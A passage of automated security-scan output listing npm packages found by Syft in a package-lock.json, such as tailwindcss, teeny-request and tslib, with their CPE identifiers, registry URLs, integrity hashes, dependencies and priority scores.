- cpe: cpe:2.3:a:svg_arc_to_cubic_bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg_arc_to_cubic_bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg-arc-to-cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg-arc-to-cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg_arc_to_cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg_arc_to_cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg-arc-to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg-arc-to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg_arc_to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg_arc_to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg-arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg-arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg_arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg_arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:svg:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/svg-arc-to-cubic-bezier@3.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/svg-arc-to-cubic-bezier/-/svg-arc-to-cubic-bezier-3.2.0.tgz
integrity: sha512-djbJ/vZKZO+gPoSDThGNpKDO+o+bAeA4XQKovvkNCqnIS2t+S4qnLAGQhyyrulhCFRl1WWzAp0wUDV8PpTVU3g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0702fc96b298768b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: tailwindcss 3.4.19'
title: tailwindcss 3.4.19
description: 'Package discovered: tailwindcss 3.4.19'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4180007fa4dbcaa3
name: tailwindcss
version: 3.4.19
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:tailwindcss:tailwindcss:3.4.19:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/tailwindcss@3.4.19
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/tailwindcss/-/tailwindcss-3.4.19.tgz
integrity: sha512-3ofp+LL8E+pK/JuPLPggVAIaEuhvIz4qNcf3nA1Xn2o/7fb7s/TYpHhwGDv1ZU3PkBluUVaF8PyCHcm48cKLWQ==
dependencies:
'@alloc/quick-lru': ^5.2.0
arg: ^5.0.2
chokidar: ^3.6.0
didyoumean: ^1.2.2
dlv: ^1.1.3
fast-glob: ^3.3.2
glob-parent: ^6.0.2
is-glob: ^4.0.3
jiti: ^1.21.7
lilconfig: ^3.1.3
micromatch: ^4.0.8
normalize-path: ^3.0.0
object-hash: ^3.0.0
picocolors: ^1.1.1
postcss: ^8.4.47
postcss-import: ^15.1.0
postcss-js: ^4.0.1
postcss-load-config: ^4.0.2 || ^5.0 || ^6.0
postcss-nested: ^6.2.0
postcss-selector-parser: ^6.1.2
resolve: ^1.22.8
sucrase: ^3.35.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1167979aa3e3af06
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: teeny-request 9.0.0'
title: teeny-request 9.0.0
description: 'Package discovered: teeny-request 9.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5100f72eed8a2178
name: teeny-request
version: 9.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:teeny-request:teeny-request:9.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:teeny-request:teeny_request:9.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:teeny_request:teeny-request:9.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:teeny_request:teeny_request:9.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:teeny:teeny-request:9.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:teeny:teeny_request:9.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/teeny-request@9.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz
integrity: sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==
dependencies:
http-proxy-agent: ^5.0.0
https-proxy-agent: ^5.0.0
node-fetch: ^2.6.9
stream-events: ^1.0.5
uuid: ^9.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b4e9549620686503
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: thenify 3.3.1'
title: thenify 3.3.1
description: 'Package discovered: thenify 3.3.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9fd87e687c3b74ca
name: thenify
version: 3.3.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:thenify:thenify:3.3.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/thenify@3.3.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/thenify/-/thenify-3.3.1.tgz
integrity: sha512-RVZSIV5IG10Hk3enotrhvz0T9em6cyHBLkH/YAZuKqd8hRkKhSfCGIcP2KUY0EPxndzANBmNllzWPwak+bheSw==
dependencies:
any-promise: ^1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a439c679c65c98cd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: thenify-all 1.6.0'
title: thenify-all 1.6.0
description: 'Package discovered: thenify-all 1.6.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 845b1699e3aa7533
name: thenify-all
version: 1.6.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:thenify-all:thenify-all:1.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:thenify-all:thenify_all:1.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:thenify_all:thenify-all:1.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:thenify_all:thenify_all:1.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:thenify:thenify-all:1.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:thenify:thenify_all:1.6.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/thenify-all@1.6.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/thenify-all/-/thenify-all-1.6.0.tgz
integrity: sha512-RNxQH/qI8/t3thXJDwcstUO4zeqo64+Uy/+sNVRBx4Xn2OX+OZ9oP+iJnNFqplFra2ZUVeKCSa2oVWi3T4uVmA==
dependencies:
thenify: '>= 3.1.0 < 4'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e5c0090ac7c6baa4
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: thirty-two 1.0.2'
title: thirty-two 1.0.2
description: 'Package discovered: thirty-two 1.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f3444a348db654fb
name: thirty-two
version: 1.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:thirty-two:thirty-two:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:thirty-two:thirty_two:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:thirty_two:thirty-two:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:thirty_two:thirty_two:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:thirty:thirty-two:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:thirty:thirty_two:1.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/thirty-two@1.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/thirty-two/-/thirty-two-1.0.2.tgz
integrity: sha512-OEI0IWCe+Dw46019YLl6V10Us5bi574EvlJEOcAkB29IzQ/mYD1A6RyNHLjZPiHCmuodxvgF6U+vZO1L15lxVA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ed31df7df590fd3e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: tiny-inflate 1.0.3'
title: tiny-inflate 1.0.3
description: 'Package discovered: tiny-inflate 1.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8a9f89a30def4776
name: tiny-inflate
version: 1.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:tiny-inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:tiny-inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:tiny_inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:tiny_inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:tiny:tiny-inflate:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:tiny:tiny_inflate:1.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/tiny-inflate@1.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/tiny-inflate/-/tiny-inflate-1.0.3.tgz
integrity: sha512-pkY1fj1cKHb2seWDy0B16HeWyczlJA9/WW3u3c4z/NiWDsO3DOU5D7nhTLE9CF0yXv/QZFY7sEJmj24dK+Rrqw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 99c39b0d16665208
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: tiny-invariant 1.3.3'
title: tiny-invariant 1.3.3
description: 'Package discovered: tiny-invariant 1.3.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 509a74e9f8ec9c11
name: tiny-invariant
version: 1.3.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:tiny-invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:tiny-invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:tiny_invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:tiny_invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:tiny:tiny-invariant:1.3.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:tiny:tiny_invariant:1.3.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/tiny-invariant@1.3.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/tiny-invariant/-/tiny-invariant-1.3.3.tgz
integrity: sha512-+FbBPE1o9QAYvviau/qC5SE3caw21q3xkvWKBtja5vgqOWIHHJ3ioaq1VPfn/Szqctz2bU/oYeKd9/z5BL+PVg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e99ae3502724aa2b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: tinyglobby 0.2.16'
title: tinyglobby 0.2.16
description: 'Package discovered: tinyglobby 0.2.16'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ea1b10e091012c4d
name: tinyglobby
version: 0.2.16
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:tinyglobby:tinyglobby:0.2.16:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/tinyglobby@0.2.16
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.16.tgz
integrity: sha512-pn99VhoACYR8nFHhxqix+uvsbXineAasWm5ojXoN8xEwK5Kd3/TrhNn1wByuD52UxWRLy8pu+kRMniEi6Eq9Zg==
dependencies:
fdir: ^6.5.0
picomatch: ^4.0.4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 098e9c86e46e996b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: to-regex-range 5.0.1'
title: to-regex-range 5.0.1
description: 'Package discovered: to-regex-range 5.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 32aacf96124c437a
name: to-regex-range
version: 5.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:to-regex-range:to-regex-range:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:to-regex-range:to_regex_range:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:to_regex_range:to-regex-range:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:to_regex_range:to_regex_range:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:to-regex:to-regex-range:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:to-regex:to_regex_range:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:to_regex:to-regex-range:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:to_regex:to_regex_range:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:to:to-regex-range:5.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:to:to_regex_range:5.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/to-regex-range@5.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz
integrity: sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==
dependencies:
is-number: ^7.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: eba377c5cfb24e56
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: toidentifier 1.0.1'
title: toidentifier 1.0.1
description: 'Package discovered: toidentifier 1.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ce376bb248c7ffa1
name: toidentifier
version: 1.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:toidentifier:toidentifier:1.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/toidentifier@1.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz
integrity: sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 332c86a1be157c00
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: tr46 0.0.3'
title: tr46 0.0.3
description: 'Package discovered: tr46 0.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 44b5fbfc3cffc498
name: tr46
version: 0.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:tr46:tr46:0.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/tr46@0.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz
integrity: sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 975e90d4d26bc8ab
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ts-interface-checker 0.1.13'
title: ts-interface-checker 0.1.13
description: 'Package discovered: ts-interface-checker 0.1.13'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4b85ef460bf1550e
name: ts-interface-checker
version: 0.1.13
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ts-interface-checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ts-interface-checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ts_interface_checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ts_interface_checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ts-interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ts-interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ts_interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ts_interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ts:ts-interface-checker:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ts:ts_interface_checker:0.1.13:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/ts-interface-checker@0.1.13
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ts-interface-checker/-/ts-interface-checker-0.1.13.tgz
integrity: sha512-Y/arvbn+rrz3JCKl9C4kVNfTfSm2/mEp5FSz5EsZSANGPSlQrpRI5M4PKF+mJnE52jOO90PnPSc3Ur3bTQw0gA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ef69db02aad9ddba
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: tslib 2.4.1'
title: tslib 2.4.1
description: 'Package discovered: tslib 2.4.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a41a6d4fcfaa1c57
name: tslib
version: 2.4.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: 0BSD
spdxExpression: 0BSD
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:tslib:tslib:2.4.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/tslib@2.4.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz
integrity: sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 15d8d07e284b7f66
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: tslib 2.8.1'
title: tslib 2.8.1
description: 'Package discovered: tslib 2.8.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 732c6f5be784c8f2
name: tslib
version: 2.8.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: 0BSD
spdxExpression: 0BSD
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:tslib:tslib:2.8.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/tslib@2.8.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz
integrity: sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
